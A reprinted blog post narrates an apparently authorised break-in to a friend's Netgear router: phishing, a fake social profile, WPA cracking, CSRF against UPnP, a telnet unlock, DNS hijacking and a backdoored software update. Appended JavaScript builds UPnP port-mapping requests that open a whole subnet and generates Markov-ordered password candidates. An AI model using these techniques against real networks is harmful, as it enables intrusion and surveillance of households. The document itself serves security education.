Penetration test in the living room: how do hackers break into your wireless router?

Source: Internet
Author: User
Tags: email account, root access, mitm attack

Recently, serious security vulnerabilities have surfaced in wireless router products. The national Internet emergency response center reported a large number of security vulnerabilities in home wireless routers, a sign that wireless routers have become a major threat to personal network security.

Why have wireless routers become a hacker target overnight? Once the wireless router (home gateway) is compromised, the attacker can monitor and redirect all network traffic on the LAN: PCs, iPads, smartphones, NAS boxes, even game consoles. Router security is generally poor and firmware patches arrive slowly, which makes routers an easy target.

Although wireless routers have well-known security vulnerabilities, few people know the specific techniques hackers use to break into them.

In fact, for a hacker, attacking an individual's wireless router is much harder than attacking a large company (especially when the target has professional information security knowledge and promptly applies router firmware updates), because the attack surface an individual exposes is small. Recently, an information security expert invited Phikshun, a reverse engineer, to break into his wireless router. Phikshun's blog post details the entire attack process and the techniques used; it is worth reading for information security professionals and is reprinted below:

A while ago, a friend who works in information security asked me to do something odd: hack his router. Let's call him Bill. For privacy, other names and locations have been changed, but the vendor name is kept.

Hacking a large company is easy (probably). Their IT assets may be spread around the world. Although they invest in all kinds of protection technology, it is hard for them to keep track of everything they have. They have to scan, patch, and reboot every asset, day after day.

Hacking an individual, however, is very hard. Yes, black hats have the advantage of asymmetry in information security: sometimes you only need one bug (to break into a large company). But compared with a large company, the attack surface an individual exposes is tiny. On top of that, many people rely on large vendors and cloud providers, which often do a good job of protecting people from attack.

I started with basic reconnaissance. I like to use Maltego, plus sites such as checkusernames.com, knowem.com and Pipl search, and other tools to enumerate the target's online presence. There are also the classics: Google+, Facebook, and LinkedIn. A fake Facebook profile is useful here: you plant bait information for your target so that more information can be pulled out through the social media engine.

With the online presence mapped, password resets are low-hanging fruit. I have seen web mail account information recoverable directly from a target's Facebook profile. I'm sure most people don't even realize this; they may have forgotten the reset questions they wrote five years ago. But none of that was useful here. Remember, my target was an information security nerd who was expecting me.

Time to go after him. First, I checked whether he exposed anything on his home Internet connection. He might have set something up long ago and forgotten about it. Many applications and devices use UPnP to punch holes through consumer firewalls; sometimes a single NAS or media server is enough to open a back door. To find his home IP address I used a Skype resolver such as resolvme.org, which works great. I scanned his IP address (and those of a few neighbors) to see whether I could find any services. No dice... but I'm sure he expected me to try.

Okay, next: 802.11. Wireless is a great attack vector. I have two Radeon 6990 graphics cards in an i7 box for cracking WPA hashes. I use a Markov predictive wordlist generator to feed candidates to oclHashcat. It reaches an average crack rate of 80% within 8 hours.

So I drove over to Bill's address (with an assortment of Alfa wifi cards). Yes, I know Bill's address; maybe I got it through reconnaissance or the social media engine. It is no secret. After capturing a WPA handshake, I ran the cracker for a week. That works on most people, but Bill is an infosec guy; his WPA key is probably more than 32 characters long.

At this point you may wonder why I didn't just hit him with a Java 0-day and go enjoy my beer. The answer is simple: I know my target. He is devoted to the scan, patch, repeat mantra. I had a browser 0-day, and I won it last week.


After my visit to Bill's place, I came away with one useful piece of information: the MAC address (BSSID) of the wireless router, 06:A1:51:E3:15:E3. With the OUI (the first three bytes of the MAC), I knew it was a Netgear router. Of course I also knew of some problems with Netgear routers, but Bill runs the latest firmware. That does not mean all the vulnerabilities are fixed in that firmware. The only way to find out is to buy a Netgear router and test it yourself.

I could not pin down the exact model (it cannot be determined remotely anyway). Consumer devices vary a lot between models, because the reference platforms come from SoC vendors such as Broadcom and Atheros. I know Bill is a bit frugal, so I picked the WNDR3400v3, an entry-level product.

After learning about some of the device's weaknesses, I wrote two Metasploit modules. The first uses a CSRF vulnerability to send a POST request to the UPnP interface and punch a hole through to the router's own remote administration service. This problem exists on many other devices and deserves attention.

If you can use CSRF to forge UPnP requests, you can own the entire network.

This is the key point. I opened a single port, but you could use Ajax requests from the victim's browser to configure NAT entries for every IP address in the subnet and effectively disable the firewall. Of course, there are hard limits on the number of UPnP NAT entries, but most devices allow enough entries to map a few key ports to around 100 hosts.

To lure Bill into my trap, I sent him an email containing a link. Cobalt Strike has a tool to clone an existing email (subject and all), so this is easy; all I had to do was change the link. So what email will anyone click on, even an infosec guy? An invitation.

Edit: Some readers may wonder why Bill fell for this. Even a simple check of the sender's domain or of the link would have revealed the problem. A good pretext is the key to success. For background on pretexts, read this article. In this case, the invitation appeared to come from someone he had met with that afternoon. Well, there are many informal job interviews. I think this is confirmation bias: he wanted to believe he had got the job.

Before sending the email, I needed a follow-up payload. By default the telnet port is open on Netgear routers, but the service does not respond; you have to connect to the port and send a special unlock code. There is already a public exploit for this, but I wrote another MSF module because I like Ruby (and Metasploit).

Bill clicked the link. When I saw the callback, I fired the second module and logged in to the router over telnet. With root access on the router, I immediately changed the DNS settings to point at a DNS server under my control.

Controlling DNS is a joy. It effectively gives you all the man-in-the-middle you need. There are many MITM vectors, but I still like Evilgrade for its stealth. Evilgrade has been around for years, but it is still great (with some necessary tweaks). I waited about a week before Bill decided to upgrade Notepad++ to a new version. When he did, he got a backdoored build, which also gave me a Meterpreter shell on his computer. I immediately sent him an email with a recording and a key. A few minutes later, he pulled the plug on his computer.

In the end I was rewarded with a six-pack of Ruby beer. I love my Ruby!
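The "key point" in the post above, a CSRF'd POST to the router's UPnP interface that adds NAT entries for every host in the subnet, is easier to reason about with the request in front of you. What follows is an added example, not Phikshun's Metasploit module or any vendor code: it builds the standard UPnP IGD `WANIPConnection:1` `AddPortMapping` SOAP request and plans how many entries a /24 needs under a device's NAT-entry limit. The control URL, the port numbers and the router's willingness to accept such a request from a page in the victim's browser (the device-specific bug the post alludes to) are assumptions; the example only constructs the requests and never sends them.

```javascript
// Added example (not from the original post): the UPnP IGD AddPortMapping request
// that a CSRF-to-UPnP payload would issue, plus a planner that shows how many
// entries it takes to expose a whole /24 within a device's NAT-entry limit.
// The envelope and argument names are the standard WANIPConnection:1 ones; the
// control URL and the example hosts/ports are assumptions.

const SERVICE = 'urn:schemas-upnp-org:service:WANIPConnection:1';

// Escape the few characters that would break the XML body.
function xmlEscape(value) {
  return String(value).replace(/[<>&]/g, (c) => ({ '<': '&lt;', '>': '&gt;', '&': '&amp;' }[c]));
}

// SOAP body for one mapping: WAN externalPort -> internalClient:internalPort.
function buildAddPortMapping({ internalClient, internalPort, externalPort,
                               protocol = 'TCP', description = 'example', leaseSeconds = 0 }) {
  return [
    '<?xml version="1.0"?>',
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"',
    ' s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">',
    '<s:Body>',
    `<u:AddPortMapping xmlns:u="${SERVICE}">`,
    '<NewRemoteHost></NewRemoteHost>',            // empty = any remote source
    `<NewExternalPort>${externalPort}</NewExternalPort>`,
    `<NewProtocol>${protocol}</NewProtocol>`,
    `<NewInternalPort>${internalPort}</NewInternalPort>`,
    `<NewInternalClient>${xmlEscape(internalClient)}</NewInternalClient>`,
    '<NewEnabled>1</NewEnabled>',
    `<NewPortMappingDescription>${xmlEscape(description)}</NewPortMappingDescription>`,
    `<NewLeaseDuration>${leaseSeconds}</NewLeaseDuration>`, // 0 = permanent
    '</u:AddPortMapping>',
    '</s:Body>',
    '</s:Envelope>',
  ].join('\n');
}

// The full HTTP request the IGD control point expects. The control URL is
// device-specific (read from the device description XML) and is assumed here.
function buildRequest(controlUrl, mapping) {
  return {
    url: controlUrl,
    method: 'POST',
    headers: {
      'Content-Type': 'text/xml; charset="utf-8"',
      'SOAPAction': `"${SERVICE}#AddPortMapping"`,
    },
    body: buildAddPortMapping(mapping),
  };
}

// Plan one mapping per (host, port) for every host in a /24, stopping at the
// device's NAT-entry limit. External ports must be unique per protocol, so they
// are handed out sequentially from a high base.
function planSubnetMappings(subnetPrefix, internalPorts, maxEntries, externalBase = 40000) {
  const plan = [];
  let nextExternal = externalBase;
  for (let host = 1; host <= 254 && plan.length < maxEntries; host++) {
    for (const port of internalPorts) {
      if (plan.length >= maxEntries) break;
      plan.push({ internalClient: `${subnetPrefix}.${host}`,
                  internalPort: port, externalPort: nextExternal++ });
    }
  }
  return plan;
}

// How many distinct LAN hosts a plan reaches.
function hostsCovered(plan) {
  return new Set(plan.map((m) => m.internalClient)).size;
}

// Stand-alone run: a 200-entry budget and two ports reaches 100 hosts, which is
// the order of magnitude the post quotes.
const demoPlan = planSubnetMappings('192.168.1', [445, 3389], 200);
console.log(`${demoPlan.length} entries cover ${hostsCovered(demoPlan)} hosts`);
console.log(buildRequest('http://192.168.1.1:5000/ctl/IPConn', demoPlan[0]).body);
```

A defender can turn the same service around: `GetGenericPortMappingEntry` on the same `WANIPConnection:1` service enumerates the current mappings, and any entry that points at a host or port nobody asked for is exactly the hole the post describes.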
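The post mentions feeding oclHashcat from a "Markov predictive wordlist generator" rather than a flat dictionary. To show what that means in practice, here is an added example (not the tool the post's author used, and not hashcat's own code): a position-aware Markov model trained on a tiny constructed wordlist, and a beam search that emits the most probable candidates of a given length first. The training words are made up for the example; the real thing would be trained on a large leaked-password corpus.

```javascript
// Added example (not from the original post): a per-position Markov model of
// the kind used to order password candidates for a WPA cracker. Trained on a
// constructed toy wordlist; 'password' is repeated on purpose so the effect of
// frequency on candidate order is visible.

const START = ''; // "previous character" before position 0

// stats[pos] = Map<prevChar, Map<nextChar, count>>: how often each character
// follows a given character at a given position in the training words.
function trainMarkov(words) {
  const stats = [];
  for (const word of words) {
    let prev = START;
    for (let pos = 0; pos < word.length; pos++) {
      if (!stats[pos]) stats[pos] = new Map();
      if (!stats[pos].has(prev)) stats[pos].set(prev, new Map());
      const counts = stats[pos].get(prev);
      counts.set(word[pos], (counts.get(word[pos]) || 0) + 1);
      prev = word[pos];
    }
  }
  return stats;
}

// Conditional next-character distribution at `pos` given `prev`, sorted by
// probability (highest first), ties broken by character for determinism.
function transitions(stats, pos, prev) {
  const counts = stats[pos] && stats[pos].get(prev);
  if (!counts) return [];
  let total = 0;
  for (const c of counts.values()) total += c;
  return [...counts.entries()]
    .map(([ch, c]) => [ch, c / total])
    .sort((a, b) => b[1] - a[1] || (a[0] < b[0] ? -1 : 1));
}

// Beam search: keep the `beamWidth` most probable prefixes at each position and
// return the surviving full-length candidates, most probable first. Products of
// probabilities are fine at password lengths; use log-space for long strings.
function topCandidates(stats, length, beamWidth) {
  let beam = [{ text: '', p: 1 }];
  for (let pos = 0; pos < length; pos++) {
    const next = [];
    for (const cand of beam) {
      const prev = pos === 0 ? START : cand.text[pos - 1];
      for (const [ch, prob] of transitions(stats, pos, prev)) {
        next.push({ text: cand.text + ch, p: cand.p * prob });
      }
    }
    next.sort((a, b) => b.p - a.p || (a.text < b.text ? -1 : 1));
    beam = next.slice(0, beamWidth);
  }
  return beam.map((c) => c.text);
}

// Constructed training data for the example.
const TRAINING = ['password', 'password', 'passw0rd', 'passport', 'letmein1'];

// Stand-alone run: the four most likely 8-character candidates under the model.
const model = trainMarkov(TRAINING);
console.log(topCandidates(model, 8, 4).join('\n'));
```

The point for a cracker is ordering, not coverage: a Markov-ordered stream tries 'password' before 'passwort' because the r→d transition at position 7 is three times as common in the training data, so the likely keys are hit early in a fixed time budget.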

